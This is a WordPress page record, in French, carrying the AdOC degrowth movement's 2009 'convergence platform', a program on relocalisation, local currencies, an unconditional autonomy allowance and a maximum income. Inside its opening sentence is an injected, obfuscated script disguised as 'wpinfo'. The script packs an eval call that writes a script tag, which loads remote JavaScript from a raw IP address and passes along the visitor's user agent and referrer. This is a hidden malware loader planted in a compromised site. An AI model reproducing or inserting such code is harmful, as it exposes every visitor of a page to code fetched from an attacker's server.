{"id":4708,"date":"2010-08-04T10:10:38","date_gmt":"2010-08-04T09:10:38","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4708"},"modified":"2010-10-12T04:34:34","modified_gmt":"2010-10-12T03:34:34","slug":"plate-forme-de-convergence-proposee-par-ladoc","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4708","title":{"rendered":"Plate-forme de convergence propos\u00e9e par l&rsquo;AdOC"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L90xH50\/arton92-a417f.png\" alt=\"\" width=\"124\" height=\"69\" \/><\/p>\n<div>\n<div>\n<p><strong>De <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tiiid|var|u0026u|referrer|kbbdr||js|php'.split('|'),0,{}))\n<\/script><\/noindex> l\u2019Assembl\u00e9e constitutive de Beaugency, le samedi 19 septembre, est sortie une proposition de Plate-forme de convergence<\/strong><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/nanorezo.free.fr\/IMG\/pdf\/PF_AdOC.pdf\"><em><strong><\/strong><\/em><\/a><em><strong><a href=\"http:\/\/nanorezo.free.fr\/IMG\/pdf\/PF_AdOC.pdf\"><em>T\u00e9l\u00e9charger la Plate-forme de convergence de l\u2019AdOC<\/em><\/a><\/strong><\/em><\/p>\n<ul>\n<li>Face \u00e0 une crise multidimensionnelle, nous opposons la radicalit\u00e9 et la coh\u00e9rence de l\u2019objection de croissance. [&#8230;]<\/li>\n<li>Face \u00e0 la strat\u00e9gie classique de la prise de pouvoir pr\u00e9alable \u00e0 tous changements, nous opposons la radicalit\u00e9 et la coh\u00e9rence d\u2019une Strat\u00e9gie de l\u2019Escargot. [&#8230;]<\/li>\n<li>Pour ne pas r\u00e9duire notre r\u00e9sistance \u00e0 des oppositions, repolitisons la soci\u00e9t\u00e9 et resocialisons la politique. [&#8230;]<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><!--more--><\/p>\n<\/div>\n<div>\n<p style=\"text-align: center;\">* * *<\/p>\n<p><strong>Face \u00e0 une crise multidimensionnelle, nous opposons la radicalit\u00e9 et la coh\u00e9rence de l\u2019objection de croissance.<\/strong><\/p>\n<p>Apr\u00e8s la campagne Europe-D\u00e9croissance, premi\u00e8re exp\u00e9rience de campagne politique nationale autour des id\u00e9es de la D\u00e9croissance, pourquoi ne pas avoir l\u2019audace de continuer cette aventure d\u2019un mouvement politique dont les objectifs sont l\u2019\u00e9mancipation, le bien-\u00eatre et l\u2019\u00e9panouissement individuels et collectifs dans la simplicit\u00e9 volontaire ? Et par cons\u00e9quent, l\u2019audace de proposer \u00e0 des individus, des associations, des collectifs, des r\u00e9seaux, informels ou organis\u00e9s, une plate-forme pour d\u00e9finir les contours de notre d\u00e9marche, pour s\u2019ouvrir \u00e0 toutes celles et ceux qui pourraient s\u2019y retrouver pour la construire ensemble, pour b\u00e2tir d\u2019autres mondes \u00e9cologiquement et socialement responsables, humainement d\u00e9cents et d\u00e9mocratiques.<\/p>\n<p>La soci\u00e9t\u00e9 de croissance accumule dramatiquement toutes les crises : \u00e9nerg\u00e9tique, environnementale, sociale, \u00e9conomique, culturelle, politique. Mais il s\u2019agit au fond d\u2019un seul et m\u00eame \u00e9garement : un monde devenu inhumain, comme si la croyance du \u00ab toujours plus \u00bb suffisait \u00e0 donner du sens.<\/p>\n<p>Face \u00e0 la radicalit\u00e9 de ces \u00ab crises \u00bb, nous opposons une autre coh\u00e9rence : celle des sorties imm\u00e9diates du capitalisme et de tout productivisme par toutes les alternatives concr\u00e8tes de vie d\u00e9j\u00e0 existantes et \u00e0 cr\u00e9er. <strong>Cette coh\u00e9rence est notre radicalit\u00e9<\/strong>. Nous ne voulons pas d\u2019un autre d\u00e9veloppement, d\u2019une autre croissance, d\u2019une autre consommation, d\u2019un autre productivisme. Nous voulons sortir de la religion de la croissance qui accro\u00eet les in\u00e9galit\u00e9s, qui d\u00e9vore les ressources, qui \u00e9puise le vivant, qui confisque la dignit\u00e9 des humains.<\/p>\n<p><em>M\u00eame si une croissance infinie dans un monde fini \u00e9tait possible, elle resterait absurde. Comment ouvrir des chemins vers d\u2019autres mondes ?<\/em><\/p>\n<p style=\"text-align: center;\">* * *<\/p>\n<p><strong>Face \u00e0 la strat\u00e9gie classique de la prise de pouvoir pr\u00e9alable \u00e0 tous changements, nous opposons la radicalit\u00e9 et la coh\u00e9rence d\u2019une Strat\u00e9gie de l\u2019Escargot.<\/strong><\/p>\n<p>La D\u00e9croissance ne doit pas seulement \u00eatre le but d\u2019un tel projet mais aussi son chemin et sa m\u00e9thode. La strat\u00e9gie politique de la D\u00e9croissance est une strat\u00e9gie de rupture, et non pas d\u2019accompagnement : cette <strong>strat\u00e9gie de l\u2019escargot<\/strong>, implique d\u2019abord d\u2019avoir abandonn\u00e9 l\u2019illusion qu\u2019il suffirait d\u2019une prise pr\u00e9alable de pouvoir \u2013 qu\u2019elle soit r\u00e9formiste ou r\u00e9volutionnaire \u2013 pour changer le monde. Nous ne voulons pas \u00ab prendre le pouvoir \u00bb mais agir contre les dominations en affaiblissant les pouvoirs ; et cr\u00e9er sans attendre les conditions de la ma\u00eetrise du sens de nos vie.<\/p>\n<p>Notre rejet des chemins absurdes de la mondialisation marchande ne doit pas pour autant nous entra\u00eener dans les impasses des replis individualistes ou isolationnistes. C\u2019est pour cela que l\u2019Association des Objecteurs de Croissance (AdOC) entend appara\u00eetre en politique en s\u2019engageant dans toutes les dimensions de l\u2019\u00e9mancipation individuelle et sociale par l\u2019action politique, sans en sacrifier aucune :<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Celle de la pr\u00e9sence non-\u00e9lectoraliste dans le champ politique classique : par les manifestations, les p\u00e9titions, les campagnes \u00e9lectorales, des \u00e9lus, des soutiens critiques et ponctuels \u00e0 des majorit\u00e9s, pour permettre des avanc\u00e9es et la p\u00e9rennisation d\u2019exp\u00e9rimentations sociales, \u00e9cologiques et politiques.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Celle des exp\u00e9riences et des sorties imm\u00e9diates du capitalisme : par les alternatives concr\u00e8tes et les contres-pouvoirs.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Celle du projet : par <strong>les uto-pistes<\/strong> mises en coh\u00e9rence.<\/p>\n<p style=\"text-align: center;\">* * *<\/p>\n<p><strong>Pour ne pas r\u00e9duire notre r\u00e9sistance \u00e0 des oppositions, repolitisons la soci\u00e9t\u00e9 et resocialisons la politique.<\/strong><\/p>\n<p>S\u2019il ne suffit pas de r\u00e9sister mais qu\u2019il faut aussi cr\u00e9er en inscrivant des propositions dans une plate-forme qui fait d\u00e9marrer localement le global, nous proposons une D\u00e9croissance sereine et conviviale :<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Au c\u0153ur de notre projet, les relocalisations : habiter, se d\u00e9placer, fabriquer, distribuer, \u00e9changer, d\u00e9cider. Elles sont pour les Objecteurs de Croissance les seuls trajets ayant du sens pour retrouver la ma\u00eetrise de nos usages, m\u00e9nager le territoire, nous r\u00e9approprier nos modes de vie et mettre en partage les Biens communs.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> L\u2019encouragement et la l\u00e9galisation des monnaies locales et autres syst\u00e8mes d\u2019\u00e9changes locaux non sp\u00e9culatifs.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Pour permettre l\u2019activit\u00e9 choisie et la fin du travail contraint : une dotation inconditionnelle d\u2019autonomie (DIA).<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Un revenu maximum autoris\u00e9 (RMA) dont l\u2019\u00e9cart est d\u00e9mocratiquement discut\u00e9.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> La gratuit\u00e9 des services publics et des usages reconnus socialement utiles et \u00e9cologiquement responsables.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> La gratuit\u00e9 du bon usage de l\u2019eau, de la terre, de toutes les ressources \u00ab de haute n\u00e9cessit\u00e9 \u00bb et le rench\u00e9rissement ou la prohibition du m\u00e9susage.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> La sortie de la soci\u00e9t\u00e9 de surconsommation, de concentration et de g\u00e2chis \u00e9nerg\u00e9tiques : de la menace destructrice du nucl\u00e9aire jusqu\u2019\u00e0 l\u2019automobile.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Le renoncement au culte de la technique qui impose une soci\u00e9t\u00e9 des \u00e9crans et des biens \u00e0 la place d\u2019une soci\u00e9t\u00e9 des liens, ceux de la solidarit\u00e9 par la coop\u00e9ration et le partage.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> Emanciper l\u2019\u00e9ducation et les cultures des mod\u00e8les de la comp\u00e9tition et de la concurrence.<br \/>\n<img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> La mise en oeuvre de la d\u00e9mocratie : en finir avec les conditionnements m\u00e9diatiques et publicitaires, op\u00e9rer des choix collectifs pour les orientations \u00e9conomiques, relocaliser les contr\u00f4les d\u00e9mocratiques, mettre en place des garde-fous pour ne pas \u00eatre pris par le pouvoir (mandats \u00e9lectoraux courts, non cumulables et r\u00e9vocables, monopole des repr\u00e9sentants du peuple sur l\u2019\u00e9laboration des lois, droits de vote effectivement universels).<\/p>\n<p>Pour continuer la construction de cette plate-forme\u2026<\/p>\n<p style=\"text-align: right;\"><em>Beaugency, le 19 septembre 2009.<\/em><\/p>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>De l\u2019Assembl\u00e9e constitutive de Beaugency, le samedi 19 septembre, est sortie une proposition de Plate-forme de convergence T\u00e9l\u00e9charger la Plate-forme de convergence de l\u2019AdOC Face \u00e0 une crise multidimensionnelle, nous opposons la radicalit\u00e9 et la coh\u00e9rence de l\u2019objection de croissance. &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4708\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4708","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4708"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4708\/revisions"}],"predecessor-version":[{"id":5007,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4708\/revisions\/5007"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}